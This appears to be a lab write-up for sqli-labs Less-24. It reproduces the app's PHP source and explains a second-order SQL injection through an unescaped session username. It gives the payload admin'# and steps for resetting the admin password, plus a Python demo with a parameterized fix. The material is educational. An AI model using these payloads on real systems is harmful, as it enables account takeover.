sqli-lab-less24

I. Target address

Less-24 POST - Second Order Injections *Real treat* - Stored Injections
Second Degree Injections
# Second-order injection, POST injection
http://127.0.0.1/sqli/less-24/

II. Vulnerability probing

# A new style of login form
# There is a registration point and

III. Source code analysis

#index.php
<?PHP
session_start();# start a new session lifecycle.
if (isset($_SESSION['username']) && isset($_COOKIE['Auth'])) {
# already logged in: both the session username and the Auth cookie are present
   header('Location: logged-in.php');# redirect to logged-in.php
}
?>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title>Less-24 - Second Degree Injections </title>
</head>
<body bgcolor="#000000">

<div style="text-align:center">
<form name="login" method="POST" action="login.php">
# submitted to login.php
<h2 style="text-align:center;background-image:url('../images/Less-24.jpg');background-repeat:no-repeat;background-position:center center">
<div style="padding-top:300px;text-align:center;color:#FFFF00;"><?php echo $form_title_in; ?></div>
</h2>

<div align="center">
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Username:</strong>
</td>
<td style="text-align:left">
<input name="login_user" id="login_user" type="text" value="" />
</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Password:</strong>
</td>
<td style="text-align:left">
<input name="login_password" id="login_password" type="password" value="" />
</td>
</tr>
<tr>
<td colspan="2" style="text-align:right">
<input name="mysubmit" id="mysubmit" type="submit" value="Login" /><br/><br/>

<a style="font-size:.8em;color:#FFFF00" href="forgot_password.php">Forgot your password?</a><font size="3" color="#FFFF00">
||</font>
<a style="font-size:.8em;color:#FFFF00" href="new_user.php">New User click here?</a>
</td>
</tr>

</table>
</div>
</form>
</div>
</body>
</html>

#logged-in.php
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
	if (!isset($_SESSION["username"])) 
	{
   		header('Location: index.php');
	}
	header('Location: index.php');
}
?>
<html>
<head>
<title>
</title>
</head>
<body bgcolor="#000000">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a></br></br></br>
</div>
<center>
<img src="../images/Logged-in.jpg"></br><font size="4" color="#FFFF00"></br></br>
YOU ARE LOGGED IN AS </br> 
<font size="7" color="#FFFF00"><strong>
<?php
echo $_SESSION["username"];# print the username
?>
</strong>
</br>
</br>
<font size="5" color="#FFFF00">
You can Change your password here.


<form name="mylogin" method="POST" action="pass_change.php">
# on submit, goes to pass_change.php
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Current Password:</strong></font>
</td>
	<td style="text-align:left">
		<input name="current_password" id="current_password" type="text" value="" /> 
	</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
	<strong>New Password:</strong>
</font>
</td>
<td style="text-align:left">
	<input name="password" id="password" type="password" value="" />
</td>
</tr>

<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Retype Password:</strong>
</font>
</td>
<td style="text-align:left">
<input name="re_password" id="re_password" type="password" value="" />
</td>
</tr>

<tr>
<td colspan="2" style="text-align:right">
<input name="submit" id="submit" type="submit" value="Reset" />
# reset the password
</td>
</tr>

<tr>
<td colspan="2" style="text-align:right">
<input name="submit1" id="submit1" type="submit" value="Logout" /><br/><br/>
# log out
</td>
</tr>

</table>

</center>
</body>
</html>


#pass_change.php
<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
	if (!isset($_SESSION["username"])) 
	{
   		header('Location: index.php');
	}
	header('Location: index.php');
}
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");


if (isset($_POST['submit']))
{
	
	# Validating the user input........
	$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	#mysql_real_escape_string escapes the special characters in a string for use in a SQL statement
	if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysql_affected_rows();
        #mysql_affected_rows() returns the number of rows affected by the previous MySQL operation.
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
			echo "Password successfully updated";
	
		}
		else
		{
			header('Location: failed.php');
			//echo 'You tried to be smart, Try harder!!!! :( ';
		}
	}
	else
	{
		echo '<font size="5" color="#FFFF00"><center>';
		echo "Make sure New Password and Retype Password fields have same value";
		header('refresh:2, url=index.php');
	}
}
?>
<?php
if(isset($_POST['submit1']))
{
	session_destroy();# destroy the session
	setcookie('Auth', 1 , time()-3600);
	header ('Location: index.php');# redirect to index.php
}
?>
</center>  
</body>
</html>

#login.php
<html>
<head>
</head>
<body bgcolor="#000000">
<font size="3" color="#FFFF00">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?PHP

session_start();
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function sqllogin(){

   $username = mysql_real_escape_string($_POST["login_user"]);
   $password = mysql_real_escape_string($_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";
   $res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');
   $row = mysql_fetch_row($res);
	//print_r($row) ;
   if ($row[1]) {
			return $row[1];
   } else {
      		return 0;
   }

}

$login = sqllogin();
if (!$login== 0) 
{
	$_SESSION["username"] = $login;# sets $_SESSION["username"] to the username returned by the query
	setcookie("Auth", 1, time()+3600);  /* expire in 15 Minutes */
	header('Location: logged-in.php');# redirect to logged-in
} 
else
{
?>
<tr><td colspan="2" style="text-align:center;"><br/><p style="color:#FF0000;">
<center>
<img src="../images/slap1.jpg">
</center>
</p></td></tr>
<?PHP
} 
?>

</body>
</html>

#failed.php
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
	if (!isset($_SESSION["username"])) 
	{
   		header('Location: index.php');
	}
	header('Location: index.php');
}
?>
<html>
<head>
</head>
<body bgcolor="#000000">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
</div>
<div style=" margin-top:150px;color:#FFF; font-size:24px; text-align:center">
<center>
<img src="../images/slap1.jpg">
</center>
</div> 
</body>
</html>

#new_user.php
<?php
include '../sql-connections/sql-connect.php' ;
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<title><?php echo $feedback_title_ns; ?> </title>
</head>

<body bgcolor="#000000">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<font size="3" color="#FFFF00">
<div style="text-align:center">

<form name="mylogin" method="POST" action="login_create.php"># submits to login_create.php

<h2 style="text-align:center;background-image:url('../images/Less-24-new-user.jpg');background-repeat:no-repeat;background-position:center center">
<div style="padding-top:300px;text-align:center;color:#FFFF00;"><?php echo $form_title_ns; ?></div>
</h2>

<div align="center">
<table style="margin-top:50px;">
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Desired Username:</strong></font>
</td>
	<td style="text-align:left">
		<input name="username" id="username" type="text" value="" /> 
	</td>
</tr>
<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
	<strong>Password:</strong>
</font>
</td>
<td style="text-align:left">
	<input name="password" id="password" type="password" value="" />
</td>
</tr>

<tr>
<td style="text-align:right">
<font size="3" color="#FFFF00">
<strong>Retype Password:</strong>
</font>
</td>
<td style="text-align:left">
<input name="re_password" id="re_password" type="password" value="" />
</td>
</tr>

<tr>
<td colspan="2" style="text-align:right">
<input name="submit" id="submit" type="submit" value="Register" /><br/><br/>
</td>
</tr>

</table>
</div>
</form>
</div>
</body>
</html>

#login_create.php
<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");



if (isset($_POST['submit']))
{
	

# Validating the user input........

	//$username=  $_POST['username'] ;
	$username=  mysql_escape_string($_POST['username']) ;
	$pass= mysql_escape_string($_POST['password']);
	$re_pass= mysql_escape_string($_POST['re_password']);
	
	echo "<font size='3' color='#FFFF00'>";
	$sql = "select count(*) from users where username='$username'";
	$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
  	$row = mysql_fetch_row($res);
	
	//print_r($row);
	if (!$row[0]== 0) 
		{
		?>
		<script>alert("The username Already exists, Please choose a different username ")</script>;
		<?php
		header('refresh:1, url=new_user.php');
   		} 
		else 
		{
       		if ($pass==$re_pass)
			{
				# Building up the query........
   				
   				$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
   				mysql_query($sql) or die('Error Creating your user account,  : '.mysql_error());
					echo "</br>";
					echo "<center><img src=../images/Less-24-user-created.jpg><font size='3' color='#FFFF00'>";   				
					//echo "<h1>User Created Successfully</h1>";
					echo "</br>";
					echo "</br>";
					echo "</br>";					
					echo "</br>Redirecting you to login page in 5 sec................";
					echo "<font size='2'>";
					echo "</br>If it does not redirect, click the home button on top right</center>";
					header('refresh:5, url=index.php');
			}
			else
			{
			?>
			<script>alert('Please make sure that password field and retype password match correctly')</script>
			<?php
			header('refresh:1, url=new_user.php');
			}
		}
}



?>

</body>
</html>

[Screenshot: ./assets/less-24.png]

SQL statements involved

#pass_change.php
$username= $_SESSION["username"];
# no escaping is done here!!! this is the vulnerable spot
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
#mysql_real_escape_string escapes the special characters in a string for use in a SQL statement
if($pass==$re_pass)
{	
    $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

#login.php
$username = mysql_real_escape_string($_POST["login_user"]);
$password = mysql_real_escape_string($_POST["login_password"]);
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

#login_create.php
$username=  mysql_escape_string($_POST['username']) ;
$pass= mysql_escape_string($_POST['password']);
$re_pass= mysql_escape_string($_POST['re_password']);

echo "<font size='3' color='#FFFF00'>";
$sql = "select count(*) from users where username='$username'";

$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
The parameters in login.php, login_create.php and pass_change.php are all passed through special-character escaping,
but $username = $_SESSION["username"] in pass_change.php is not escaped,
and this value is set in login.php by $_SESSION["username"] = $login;
# $login is the username returned by the SELECT, i.e. the value exactly as stored in the database

The escaping in login_create.php protects only the INSERT itself: the database stores the raw registered name, quote character included, and that raw value flows back through the SELECT into the session and from there, unescaped, into the UPDATE.

So the idea is to create a user admin' --+
then log in as that user and change the password
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin' --+' and password='$curr_pass' ";
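Added example, not part of this write-up or of the sqli-labs code: the pass_change.php query as written beside a parameterized fix, replayed against an in-memory SQLite table. SQLite stands in for MySQL, so the registered name ends in `--` instead of MySQL's `#`; the table layout and the sample passwords are assumptions.

```python
import sqlite3

# Toy copy of the lab's users table (assumption: columns id, username, password,
# matching login.php's use of $row[1] as the username). SQLite stands in for
# MySQL here, so the stored name ends in "--" where MySQL would take "#".
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'adminpass')")
    return db

def register(db, username, password):
    # login_create.php escapes its input, which protects only this INSERT;
    # the table ends up holding the raw string, quote and comment included.
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))

def login(db, username, password):
    # login.php copies the username *read back from the table* into $_SESSION.
    row = db.execute("SELECT username FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None

def pass_change_vulnerable(db, session_username, curr_pass, new_pass):
    # Mirrors pass_change.php: the session value is interpolated without escaping,
    # so a stored "admin'--" turns the WHERE clause into username='admin' -- ...
    sql = (f"UPDATE users SET password='{new_pass}' "
           f"WHERE username='{session_username}' AND password='{curr_pass}'")
    return db.execute(sql).rowcount

def pass_change_fixed(db, session_username, curr_pass, new_pass):
    # Fix: bind every value, whether it arrived from POST or from the session.
    return db.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                      (new_pass, session_username, curr_pass)).rowcount

def run_scenario(fixed):
    """Register admin'--, log in as it, change its password; return (rows affected, table)."""
    db = make_db()
    register(db, "admin'--", "123456")
    session_username = login(db, "admin'--", "123456")
    change = pass_change_fixed if fixed else pass_change_vulnerable
    affected = change(db, session_username, "123456", "newpass")
    return affected, dict(db.execute("SELECT username, password FROM users").fetchall())

if __name__ == "__main__":
    print(run_scenario(fixed=False))  # admin's row changes, the registered row does not
    print(run_scenario(fixed=True))   # only the admin'-- row changes
```

Both runs report one affected row, which is why pass_change.php prints "Password successfully updated" in the vulnerable case too; the difference is only visible in which row changed.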

IV. Black-box and white-box testing

1. Create a user
admin' --+
123456
2. Log in as this user, then change the password
3. Log in again with admin and the new password
4. Fails
(`--+` only works in a URL query string, where `+` decodes to the space that MySQL's `-- ` comment requires; in a POST form body the `+` arrives literally, so `--+'` is not a comment and the quotes stay unbalanced.)

1. Create a user
admin'#
123456
2. Log in as this user, then change the password
3. Log in again with admin and the new password
4. Succeeds

No further exploitation method for now.

V. Script writing

No script.

VI. sqlmap

No usage for now.

VII. Summary

1. A new use of second-order injection